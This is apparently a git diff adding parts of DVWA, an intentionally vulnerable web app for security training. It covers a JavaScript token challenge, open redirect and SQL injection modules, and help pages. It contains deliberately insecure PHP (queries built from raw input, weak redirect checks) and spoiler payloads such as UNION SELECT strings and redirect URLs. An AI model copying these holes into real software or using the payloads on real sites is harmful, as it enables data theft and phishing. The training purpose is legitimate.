14)) ^ (t1 >>> 3); + t1 = blocks[j - 2]; + s1 = ((t1 >>> 17) | (t1 << 15)) ^ ((t1 >>> 19) | (t1 << 13)) ^ (t1 >>> 10); + blocks[j] = blocks[j - 16] + s0 + blocks[j - 7] + s1 << 0; + } + + bc = b & c; + for (j = 0; j < 64; j += 4) { + if (this.first) { + if (this.is224) { + ab = 300032; + t1 = blocks[0] - 1413257819; + h = t1 - 150054599 << 0; + d = t1 + 24177077 << 0; + } else { + ab = 704751109; + t1 = blocks[0] - 210244248; + h = t1 - 1521486534 << 0; + d = t1 + 143694565 << 0; + } + this.first = false; + } else { + s0 = ((a >>> 2) | (a << 30)) ^ ((a >>> 13) | (a << 19)) ^ ((a >>> 22) | (a << 10)); + s1 = ((e >>> 6) | (e << 26)) ^ ((e >>> 11) | (e << 21)) ^ ((e >>> 25) | (e << 7)); + ab = a & b; + maj = ab ^ (a & c) ^ bc; + ch = (e & f) ^ (~e & g); + t1 = h + s1 + ch + K[j] + blocks[j]; + t2 = s0 + maj; + h = d + t1 << 0; + d = t1 + t2 << 0; + } + s0 = ((d >>> 2) | (d << 30)) ^ ((d >>> 13) | (d << 19)) ^ ((d >>> 22) | (d << 10)); + s1 = ((h >>> 6) | (h << 26)) ^ ((h >>> 11) | (h << 21)) ^ ((h >>> 25) | (h << 7)); + da = d & a; + maj = da ^ (d & b) ^ ab; + ch = (h & e) ^ (~h & f); + t1 = g + s1 + ch + K[j + 1] + blocks[j + 1]; + t2 = s0 + maj; + g = c + t1 << 0; + c = t1 + t2 << 0; + s0 = ((c >>> 2) | (c << 30)) ^ ((c >>> 13) | (c << 19)) ^ ((c >>> 22) | (c << 10)); + s1 = ((g >>> 6) | (g << 26)) ^ ((g >>> 11) | (g << 21)) ^ ((g >>> 25) | (g << 7)); + cd = c & d; + maj = cd ^ (c & a) ^ da; + ch = (g & h) ^ (~g & e); + t1 = f + s1 + ch + K[j + 2] + blocks[j + 2]; + t2 = s0 + maj; + f = b + t1 << 0; + b = t1 + t2 << 0; + s0 = ((b >>> 2) | (b << 30)) ^ ((b >>> 13) | (b << 19)) ^ ((b >>> 22) | (b << 10)); + s1 = ((f >>> 6) | (f << 26)) ^ ((f >>> 11) | (f << 21)) ^ ((f >>> 25) | (f << 7)); + bc = b & c; + maj = bc ^ (b & d) ^ cd; + ch = (f & g) ^ (~f & h); + t1 = e + s1 + ch + K[j + 3] + blocks[j + 3]; + t2 = s0 + maj; + e = a + t1 << 0; + a = t1 + t2 << 0; + } + + this.h0 = this.h0 + a << 0; + this.h1 = this.h1 + b << 0; + this.h2 = this.h2 + c << 0; + this.h3 = this.h3 + d << 0; + this.h4 = this.h4 + e << 0; + this.h5 = this.h5 + f << 0; + this.h6 = this.h6 + g << 0; + this.h7 = this.h7 + h << 0; + }; + + Sha256.prototype.hex = function () { + this.finalize(); + + var h0 = this.h0, h1 = this.h1, h2 = this.h2, h3 = this.h3, h4 = this.h4, h5 = this.h5, + h6 = this.h6, h7 = this.h7; + + var hex = HEX_CHARS[(h0 >> 28) & 0x0F] + HEX_CHARS[(h0 >> 24) & 0x0F] + + HEX_CHARS[(h0 >> 20) & 0x0F] + HEX_CHARS[(h0 >> 16) & 0x0F] + + HEX_CHARS[(h0 >> 12) & 0x0F] + HEX_CHARS[(h0 >> 8) & 0x0F] + + HEX_CHARS[(h0 >> 4) & 0x0F] + HEX_CHARS[h0 & 0x0F] + + HEX_CHARS[(h1 >> 28) & 0x0F] + HEX_CHARS[(h1 >> 24) & 0x0F] + + HEX_CHARS[(h1 >> 20) & 0x0F] + HEX_CHARS[(h1 >> 16) & 0x0F] + + HEX_CHARS[(h1 >> 12) & 0x0F] + HEX_CHARS[(h1 >> 8) & 0x0F] + + HEX_CHARS[(h1 >> 4) & 0x0F] + HEX_CHARS[h1 & 0x0F] + + HEX_CHARS[(h2 >> 28) & 0x0F] + HEX_CHARS[(h2 >> 24) & 0x0F] + + HEX_CHARS[(h2 >> 20) & 0x0F] + HEX_CHARS[(h2 >> 16) & 0x0F] + + HEX_CHARS[(h2 >> 12) & 0x0F] + HEX_CHARS[(h2 >> 8) & 0x0F] + + HEX_CHARS[(h2 >> 4) & 0x0F] + HEX_CHARS[h2 & 0x0F] + + HEX_CHARS[(h3 >> 28) & 0x0F] + HEX_CHARS[(h3 >> 24) & 0x0F] + + HEX_CHARS[(h3 >> 20) & 0x0F] + HEX_CHARS[(h3 >> 16) & 0x0F] + + HEX_CHARS[(h3 >> 12) & 0x0F] + HEX_CHARS[(h3 >> 8) & 0x0F] + + HEX_CHARS[(h3 >> 4) & 0x0F] + HEX_CHARS[h3 & 0x0F] + + HEX_CHARS[(h4 >> 28) & 0x0F] + HEX_CHARS[(h4 >> 24) & 0x0F] + + HEX_CHARS[(h4 >> 20) & 0x0F] + HEX_CHARS[(h4 >> 16) & 0x0F] + + HEX_CHARS[(h4 >> 12) & 0x0F] + HEX_CHARS[(h4 >> 8) & 0x0F] + + HEX_CHARS[(h4 >> 4) & 0x0F] + HEX_CHARS[h4 & 0x0F] + + HEX_CHARS[(h5 >> 28) & 0x0F] + HEX_CHARS[(h5 >> 24) & 0x0F] + + HEX_CHARS[(h5 >> 20) & 0x0F] + HEX_CHARS[(h5 >> 16) & 0x0F] + + HEX_CHARS[(h5 >> 12) & 0x0F] + HEX_CHARS[(h5 >> 8) & 0x0F] + + HEX_CHARS[(h5 >> 4) & 0x0F] + HEX_CHARS[h5 & 0x0F] + + HEX_CHARS[(h6 >> 28) & 0x0F] + HEX_CHARS[(h6 >> 24) & 0x0F] + + HEX_CHARS[(h6 >> 20) & 0x0F] + HEX_CHARS[(h6 >> 16) & 0x0F] + + HEX_CHARS[(h6 >> 12) & 0x0F] + HEX_CHARS[(h6 >> 8) & 0x0F] + + HEX_CHARS[(h6 >> 4) & 0x0F] + HEX_CHARS[h6 & 0x0F]; + if (!this.is224) { + hex += HEX_CHARS[(h7 >> 28) & 0x0F] + HEX_CHARS[(h7 >> 24) & 0x0F] + + HEX_CHARS[(h7 >> 20) & 0x0F] + HEX_CHARS[(h7 >> 16) & 0x0F] + + HEX_CHARS[(h7 >> 12) & 0x0F] + HEX_CHARS[(h7 >> 8) & 0x0F] + + HEX_CHARS[(h7 >> 4) & 0x0F] + HEX_CHARS[h7 & 0x0F]; + } + return hex; + }; + + Sha256.prototype.toString = Sha256.prototype.hex; + + Sha256.prototype.digest = function () { + this.finalize(); + + var h0 = this.h0, h1 = this.h1, h2 = this.h2, h3 = this.h3, h4 = this.h4, h5 = this.h5, + h6 = this.h6, h7 = this.h7; + + var arr = [ + (h0 >> 24) & 0xFF, (h0 >> 16) & 0xFF, (h0 >> 8) & 0xFF, h0 & 0xFF, + (h1 >> 24) & 0xFF, (h1 >> 16) & 0xFF, (h1 >> 8) & 0xFF, h1 & 0xFF, + (h2 >> 24) & 0xFF, (h2 >> 16) & 0xFF, (h2 >> 8) & 0xFF, h2 & 0xFF, + (h3 >> 24) & 0xFF, (h3 >> 16) & 0xFF, (h3 >> 8) & 0xFF, h3 & 0xFF, + (h4 >> 24) & 0xFF, (h4 >> 16) & 0xFF, (h4 >> 8) & 0xFF, h4 & 0xFF, + (h5 >> 24) & 0xFF, (h5 >> 16) & 0xFF, (h5 >> 8) & 0xFF, h5 & 0xFF, + (h6 >> 24) & 0xFF, (h6 >> 16) & 0xFF, (h6 >> 8) & 0xFF, h6 & 0xFF + ]; + if (!this.is224) { + arr.push((h7 >> 24) & 0xFF, (h7 >> 16) & 0xFF, (h7 >> 8) & 0xFF, h7 & 0xFF); + } + return arr; + }; + + Sha256.prototype.array = Sha256.prototype.digest; + + Sha256.prototype.arrayBuffer = function () { + this.finalize(); + + var buffer = new ArrayBuffer(this.is224 ? 28 : 32); + var dataView = new DataView(buffer); + dataView.setUint32(0, this.h0); + dataView.setUint32(4, this.h1); + dataView.setUint32(8, this.h2); + dataView.setUint32(12, this.h3); + dataView.setUint32(16, this.h4); + dataView.setUint32(20, this.h5); + dataView.setUint32(24, this.h6); + if (!this.is224) { + dataView.setUint32(28, this.h7); + } + return buffer; + }; + + function HmacSha256(key, is224, sharedMemory) { + var i, type = typeof key; + if (type === 'string') { + var bytes = [], length = key.length, index = 0, code; + for (i = 0; i < length; ++i) { + code = key.charCodeAt(i); + if (code < 0x80) { + bytes[index++] = code; + } else if (code < 0x800) { + bytes[index++] = (0xc0 | (code >> 6)); + bytes[index++] = (0x80 | (code & 0x3f)); + } else if (code < 0xd800 || code >= 0xe000) { + bytes[index++] = (0xe0 | (code >> 12)); + bytes[index++] = (0x80 | ((code >> 6) & 0x3f)); + bytes[index++] = (0x80 | (code & 0x3f)); + } else { + code = 0x10000 + (((code & 0x3ff) << 10) | (key.charCodeAt(++i) & 0x3ff)); + bytes[index++] = (0xf0 | (code >> 18)); + bytes[index++] = (0x80 | ((code >> 12) & 0x3f)); + bytes[index++] = (0x80 | ((code >> 6) & 0x3f)); + bytes[index++] = (0x80 | (code & 0x3f)); + } + } + key = bytes; + } else { + if (type === 'object') { + if (key === null) { + throw new Error(ERROR); + } else if (ARRAY_BUFFER && key.constructor === ArrayBuffer) { + key = new Uint8Array(key); + } else if (!Array.isArray(key)) { + if (!ARRAY_BUFFER || !ArrayBuffer.isView(key)) { + throw new Error(ERROR); + } + } + } else { + throw new Error(ERROR); + } + } + + if (key.length > 64) { + key = (new Sha256(is224, true)).update(key).array(); + } + + var oKeyPad = [], iKeyPad = []; + for (i = 0; i < 64; ++i) { + var b = key[i] || 0; + oKeyPad[i] = 0x5c ^ b; + iKeyPad[i] = 0x36 ^ b; + } + + Sha256.call(this, is224, sharedMemory); + + this.update(iKeyPad); + this.oKeyPad = oKeyPad; + this.inner = true; + this.sharedMemory = sharedMemory; + } + HmacSha256.prototype = new Sha256(); + + HmacSha256.prototype.finalize = function () { + Sha256.prototype.finalize.call(this); + if (this.inner) { + this.inner = false; + var innerHash = this.array(); + Sha256.call(this, this.is224, this.sharedMemory); + this.update(this.oKeyPad); + this.update(innerHash); + Sha256.prototype.finalize.call(this); + } + }; + + var exports = createMethod(); + exports.sha256 = exports; + exports.sha224 = createMethod(true); + exports.sha256.hmac = createHmacMethod(); + exports.sha224.hmac = createHmacMethod(true); + + if (COMMON_JS) { + module.exports = exports; + } else { + root.sha256 = exports.sha256; + root.sha224 = exports.sha224; + if (AMD) { + define(function () { + return exports; + }); + } + } +})(); + +function do_something(e){for(var t="",n=e.length-1;n>=0;n--)t+=e[n];return t} + +function token_part_3(t, y="ZZ") { + document.getElementById("token").value=sha256(document.getElementById("token").value+y) +} + +function token_part_2(e="YY") { + document.getElementById("token").value=sha256(e+document.getElementById("token").value) +} + +function token_part_1(a,b) { + document.getElementById("token").value=do_something(document.getElementById("phrase").value) +} + +document.getElementById("phrase").value=""; + +setTimeout(function(){token_part_2("XX")},300); + +document.getElementById("send").addEventListener("click", token_part_3); + +token_part_1("ABCD", 44); diff --git a/DVWA/vulnerabilities/javascript/source/impossible.php b/DVWA/vulnerabilities/javascript/source/impossible.php new file mode 100644 index 00000000..e69de29b diff --git a/DVWA/vulnerabilities/javascript/source/low.php b/DVWA/vulnerabilities/javascript/source/low.php new file mode 100644 index 00000000..fc5542c9 --- /dev/null +++ b/DVWA/vulnerabilities/javascript/source/low.php @@ -0,0 +1,24 @@ + + +/* +MD5 code from here +https://github.com/blueimp/JavaScript-MD5 +*/ + +!function(n){"use strict";function t(n,t){var r=(65535&n)+(65535&t);return(n>>16)+(t>>16)+(r>>16)<<16|65535&r}function r(n,t){return n<>>32-t}function e(n,e,o,u,c,f){return t(r(t(t(e,n),t(u,f)),c),o)}function o(n,t,r,o,u,c,f){return e(t&r|~t&o,n,t,u,c,f)}function u(n,t,r,o,u,c,f){return e(t&o|r&~o,n,t,u,c,f)}function c(n,t,r,o,u,c,f){return e(t^r^o,n,t,u,c,f)}function f(n,t,r,o,u,c,f){return e(r^(t|~o),n,t,u,c,f)}function i(n,r){n[r>>5]|=128<>>9<<4)]=r;var e,i,a,d,h,l=1732584193,g=-271733879,v=-1732584194,m=271733878;for(e=0;e>5]>>>t%32&255);return r}function d(n){var t,r=[];for(r[(n.length>>2)-1]=void 0,t=0;t>5]|=(255&n.charCodeAt(t/8))<16&&(o=i(o,8*n.length)),r=0;r<16;r+=1)u[r]=909522486^o[r],c[r]=1549556828^o[r];return e=i(u.concat(d(t)),512+8*t.length),a(i(c.concat(e),640))}function g(n){var t,r,e="";for(r=0;r>>4&15)+"0123456789abcdef".charAt(15&t);return e}function v(n){return unescape(encodeURIComponent(n))}function m(n){return h(v(n))}function p(n){return g(m(n))}function s(n,t){return l(v(n),v(t))}function C(n,t){return g(s(n,t))}function A(n,t,r){return t?r?s(t,n):C(t,n):r?m(n):p(n)}"function"==typeof define&&define.amd?define(function(){return A}):"object"==typeof module&&module.exports?module.exports=A:n.md5=A}(this); + + function rot13(inp) { + return inp.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);}); + } + + function generate_token() { + var phrase = document.getElementById("phrase").value; + document.getElementById("token").value = md5(rot13(phrase)); + } + + generate_token(); + +EOF; +?> diff --git a/DVWA/vulnerabilities/javascript/source/medium.js b/DVWA/vulnerabilities/javascript/source/medium.js new file mode 100644 index 00000000..f6c40a06 --- /dev/null +++ b/DVWA/vulnerabilities/javascript/source/medium.js @@ -0,0 +1 @@ +function do_something(e){for(var t="",n=e.length-1;n>=0;n--)t+=e[n];return t}setTimeout(function(){do_elsesomething("XX")},300);function do_elsesomething(e){document.getElementById("token").value=do_something(e+document.getElementById("phrase").value+"XX")} diff --git a/DVWA/vulnerabilities/javascript/source/medium.php b/DVWA/vulnerabilities/javascript/source/medium.php new file mode 100644 index 00000000..8849b11e --- /dev/null +++ b/DVWA/vulnerabilities/javascript/source/medium.php @@ -0,0 +1,3 @@ +'; +?> diff --git a/DVWA/vulnerabilities/open_redirect/help/help.php b/DVWA/vulnerabilities/open_redirect/help/help.php new file mode 100644 index 00000000..d4de60c6 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/help/help.php @@ -0,0 +1,57 @@ +
    +

    Help - Open HTTP Redirect

    + +
    + + + + +
    +

    About

    +

    + OWASP define this as: +

    +
    + Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. +
    + +

    As suggested above, a common use for this is to create a URL which initially goes to the real site but then redirects the victim off to a site controlled by the attacker. This site could be a clone of the target's login page to steal credentials, a request for credit card details to pay for a service on the target site, or simply a spam page full of advertising.

    + +

    + +

    Objective

    +

    Abuse the redirect page to move the user off the DVWA site or onto a different page on the site than expected.

    + +

    + +

    Low Level

    +

    The redirect page has no limitations, you can redirect to anywhere you want.

    +

    Spoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=https://digi.ninja

    + +
    + +

    Medium Level

    +

    The code prevents you from using absolute URLs to take the user off the site, so you can either use relative URLs to take them to other pages on the same site or a Protocol-relative URL.

    + +

    Spoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=//digi.ninja

    + +
    + +

    High Level

    +

    The redirect page tries to lock you to only redirect to the info.php page, but does this by checking that the URL contains "info.php".

    + +

    Spoiler: Try browsing to /vulnerabilities/open_redirect/source/low.php?redirect=https://digi.ninja/?a=info.php

    + +
    + +

    Impossible Level

    +

    Rather than accepting a page or URL as the redirect target, the system uses ID values to tell the redirect page where to redirect to. This ties the system down to only redirect to pages it knows about and so there is no way for an attacker to modify things to go to a page of their choosing.

    + +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/open_redirect/index.php b/DVWA/vulnerabilities/open_redirect/index.php new file mode 100644 index 00000000..29f582dd --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/index.php @@ -0,0 +1,60 @@ + +

    Vulnerability: Open HTTP Redirect

    + +
    +

    Hacker History

    +

    + Here are two links to some famous hacker quotes, see if you can hack them. +

    + + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html', "OWASP Unvalidated Redirects and Forwards Cheat Sheet" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect', "WSTG - Testing for Client-side URL Redirect") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://cwe.mitre.org/data/definitions/601.html', "Mitre - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')" ) . "
      • +
    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/open_redirect/source/high.php b/DVWA/vulnerabilities/open_redirect/source/high.php new file mode 100644 index 00000000..46da8d05 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/high.php @@ -0,0 +1,21 @@ + +

    You can only redirect to the info page.

    + +

    Missing redirect target.

    + diff --git a/DVWA/vulnerabilities/open_redirect/source/impossible.php b/DVWA/vulnerabilities/open_redirect/source/impossible.php new file mode 100644 index 00000000..aa9ee9a2 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/impossible.php @@ -0,0 +1,29 @@ + + Unknown redirect target. + +Missing redirect target. diff --git a/DVWA/vulnerabilities/open_redirect/source/info.php b/DVWA/vulnerabilities/open_redirect/source/info.php new file mode 100644 index 00000000..0a12ed8f --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/info.php @@ -0,0 +1,61 @@ +I got a record, I was Zero Cool
    Zero Cool. Crashed 1507 systems in one day, biggest crash in history, front page, New York Times August 10th 1988."; + break; + case 2: + $info = "Who are you anyway?
    Johnny.
    Johnny who?
    Just... Johnny?"; + break; + default: + $info = "Some other stuff"; + } +} + +if ($info == "") { + http_response_code (500); + ?> +

    Missing quote ID.

    + +

    Vulnerability: Open HTTP Redirect

    + +
    +

    Hacker Quotes

    +

    + {$info} +

    +

    Back

    + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html', "OWASP Unvalidated Redirects and Forwards Cheat Sheet" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/04-Testing_for_Client-side_URL_Redirect', "WSTG - Testing for Client-side URL Redirect") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://cwe.mitre.org/data/definitions/601.html', "Mitre - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')" ) . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/open_redirect/source/low.php b/DVWA/vulnerabilities/open_redirect/source/low.php new file mode 100644 index 00000000..28c43516 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/low.php @@ -0,0 +1,13 @@ + +

    Missing redirect target.

    + diff --git a/DVWA/vulnerabilities/open_redirect/source/medium.php b/DVWA/vulnerabilities/open_redirect/source/medium.php new file mode 100644 index 00000000..f03f1598 --- /dev/null +++ b/DVWA/vulnerabilities/open_redirect/source/medium.php @@ -0,0 +1,21 @@ + +

    Absolute URLs not allowed.

    + +

    Missing redirect target.

    + diff --git a/DVWA/vulnerabilities/sqli/help/help.php b/DVWA/vulnerabilities/sqli/help/help.php new file mode 100644 index 00000000..ed811226 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/help/help.php @@ -0,0 +1,60 @@ +
    +

    Help - SQL Injection

    + +
    + + + + +
    +

    About

    +

    A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. + A successful SQL injection exploit can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database + (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system (load_file) and in some cases issue commands to the operating system.

    + +

    SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

    + +

    This attack may also be called "SQLi".

    + +

    + +

    Objective

    +

    There are 5 users in the database, with id's from 1 to 5. Your mission... to steal their passwords via SQLi.

    + +

    + +

    Low Level

    +

    The SQL query uses RAW input that is directly controlled by the attacker. All they need to-do is escape the query and then they are able + to execute any SQL query they wish.

    + 
    Spoiler: ?id=a' UNION SELECT "text1","text2";-- -&Submit=Submit.
    + +
    + +

    Medium Level

    +

    The medium level uses a form of SQL injection protection, with the function of + "". + However due to the SQL query not having quotes around the parameter, this will not fully protect the query from being altered.

    + +

    The text box has been replaced with a pre-defined dropdown list and uses POST to submit the form.

    + 
    Spoiler: ?id=a UNION SELECT 1,2;-- -&Submit=Submit.
    + +
    + +

    High Level

    +

    This is very similar to the low level, however this time the attacker is inputting the value in a different manner. + The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

    + 
    Spoiler: ID: a' UNION SELECT "text1","text2";-- -&Submit=Submit.
    + +
    + +

    Impossible Level

    +

    The queries are now parameterized queries (rather than being dynamic). This means the query has been defined by the developer, + and has distinguish which sections are code, and the rest is data.

    +
    + +
    + +
    + +

    Reference:

    +
    diff --git a/DVWA/vulnerabilities/sqli/index.php b/DVWA/vulnerabilities/sqli/index.php new file mode 100644 index 00000000..886692a6 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/index.php @@ -0,0 +1,82 @@ + +

    Vulnerability: SQL Injection

    + +
    "; +if( $vulnerabilityFile == 'high.php' ) { + $page[ 'body' ] .= "Click here to change your ID."; +} +else { + $page[ 'body' ] .= " +
    +

    + User ID:"; + if( $vulnerabilityFile == 'medium.php' ) { + $page[ 'body' ] .= "\n "; + } + else + $page[ 'body' ] .= "\n "; + + $page[ 'body' ] .= "\n +

    \n"; + + if( $vulnerabilityFile == 'impossible.php' ) + $page[ 'body' ] .= " " . tokenField(); + + $page[ 'body' ] .= " +
    "; +} +$page[ 'body' ] .= " + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/SQL_injection' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-community/attacks/SQL_Injection' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://bobby-tables.com/' ) . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/sqli/session-input.php b/DVWA/vulnerabilities/sqli/session-input.php new file mode 100644 index 00000000..715f55ec --- /dev/null +++ b/DVWA/vulnerabilities/sqli/session-input.php @@ -0,0 +1,32 @@ +

    "; + $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}


    "; + $page[ 'body' ] .= ""; +} + +$page[ 'body' ] .= " +
    + + +
    +
    +
    + +"; + +dvwaSourceHtmlEcho( $page ); + +?> + + diff --git a/DVWA/vulnerabilities/sqli/source/high.php b/DVWA/vulnerabilities/sqli/source/high.php new file mode 100644 index 00000000..996eee12 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/source/high.php @@ -0,0 +1,53 @@ +Something went wrong.' ); + + // Get results + while( $row = mysqli_fetch_assoc( $result ) ) { + // Get values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; + #print $query; + try { + $results = $sqlite_db_connection->query($query); + } catch (Exception $e) { + echo 'Caught exception: ' . $e->getMessage(); + exit(); + } + + if ($results) { + while ($row = $results->fetchArray()) { + // Get values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + } else { + echo "Error in fetch ".$sqlite_db->lastErrorMsg(); + } + break; + } +} + +?> diff --git a/DVWA/vulnerabilities/sqli/source/impossible.php b/DVWA/vulnerabilities/sqli/source/impossible.php new file mode 100644 index 00000000..ff9effcb --- /dev/null +++ b/DVWA/vulnerabilities/sqli/source/impossible.php @@ -0,0 +1,65 @@ +prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' ); + $data->bindParam( ':id', $id, PDO::PARAM_INT ); + $data->execute(); + $row = $data->fetch(); + + // Make sure only 1 result is returned + if( $data->rowCount() == 1 ) { + // Get values + $first = $row[ 'first_name' ]; + $last = $row[ 'last_name' ]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + break; + case SQLITE: + global $sqlite_db_connection; + + $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' ); + $stmt->bindValue(':id',$id,SQLITE3_INTEGER); + $result = $stmt->execute(); + $result->finalize(); + if ($result !== false) { + // There is no way to get the number of rows returned + // This checks the number of columns (not rows) just + // as a precaution, but it won't stop someone dumping + // multiple rows and viewing them one at a time. + + $num_columns = $result->numColumns(); + if ($num_columns == 2) { + $row = $result->fetchArray(); + + // Get values + $first = $row[ 'first_name' ]; + $last = $row[ 'last_name' ]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + } + + break; + } + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/sqli/source/low.php b/DVWA/vulnerabilities/sqli/source/low.php new file mode 100644 index 00000000..6d84afc3 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/source/low.php @@ -0,0 +1,56 @@ +' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' ); + + // Get results + while( $row = mysqli_fetch_assoc( $result ) ) { + // Get values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + + mysqli_close($GLOBALS["___mysqli_ston"]); + break; + case SQLITE: + global $sqlite_db_connection; + + #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']); + #$sqlite_db_connection->enableExceptions(true); + + $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; + #print $query; + try { + $results = $sqlite_db_connection->query($query); + } catch (Exception $e) { + echo 'Caught exception: ' . $e->getMessage(); + exit(); + } + + if ($results) { + while ($row = $results->fetchArray()) { + // Get values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + } else { + echo "Error in fetch ".$sqlite_db->lastErrorMsg(); + } + break; + } +} + +?> diff --git a/DVWA/vulnerabilities/sqli/source/medium.php b/DVWA/vulnerabilities/sqli/source/medium.php new file mode 100644 index 00000000..7dab403e --- /dev/null +++ b/DVWA/vulnerabilities/sqli/source/medium.php @@ -0,0 +1,59 @@ +' . mysqli_error($GLOBALS["___mysqli_ston"]) . '' ); + + // Get results + while( $row = mysqli_fetch_assoc( $result ) ) { + // Display values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + break; + case SQLITE: + global $sqlite_db_connection; + + $query = "SELECT first_name, last_name FROM users WHERE user_id = $id;"; + #print $query; + try { + $results = $sqlite_db_connection->query($query); + } catch (Exception $e) { + echo 'Caught exception: ' . $e->getMessage(); + exit(); + } + + if ($results) { + while ($row = $results->fetchArray()) { + // Get values + $first = $row["first_name"]; + $last = $row["last_name"]; + + // Feedback for end user + $html .= "
    ID: {$id}
    First name: {$first}
    Surname: {$last}
    "; + } + } else { + echo "Error in fetch ".$sqlite_db->lastErrorMsg(); + } + break; + } +} + +// This is used later on in the index.php page +// Setting it here so we can close the database connection in here like in the rest of the source scripts +$query = "SELECT COUNT(*) FROM users;"; +$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '
    ' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
    ' ); +$number_of_rows = mysqli_fetch_row( $result )[0]; + +mysqli_close($GLOBALS["___mysqli_ston"]); +?> diff --git a/DVWA/vulnerabilities/sqli/test.php b/DVWA/vulnerabilities/sqli/test.php new file mode 100644 index 00000000..aaadf8e5 --- /dev/null +++ b/DVWA/vulnerabilities/sqli/test.php @@ -0,0 +1,14 @@ +"; +} +?> diff --git a/DVWA/vulnerabilities/sqli_blind/cookie-input.php b/DVWA/vulnerabilities/sqli_blind/cookie-input.php new file mode 100644 index 00000000..d4234ea8 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/cookie-input.php @@ -0,0 +1,31 @@ +

    "; + $page[ 'body' ] .= ""; +} + +$page[ 'body' ] .= " +
    + + +
    +
    +
    + +"; + +dvwaSourceHtmlEcho( $page ); + +?> + + diff --git a/DVWA/vulnerabilities/sqli_blind/help/help.php b/DVWA/vulnerabilities/sqli_blind/help/help.php new file mode 100644 index 00000000..e1212cc4 --- /dev/null +++ b/DVWA/vulnerabilities/sqli_blind/help/help.php @@ -0,0 +1,62 @@ +
    +

    Help - SQL Injection (Blind)

    + +
    + + + + +
    +

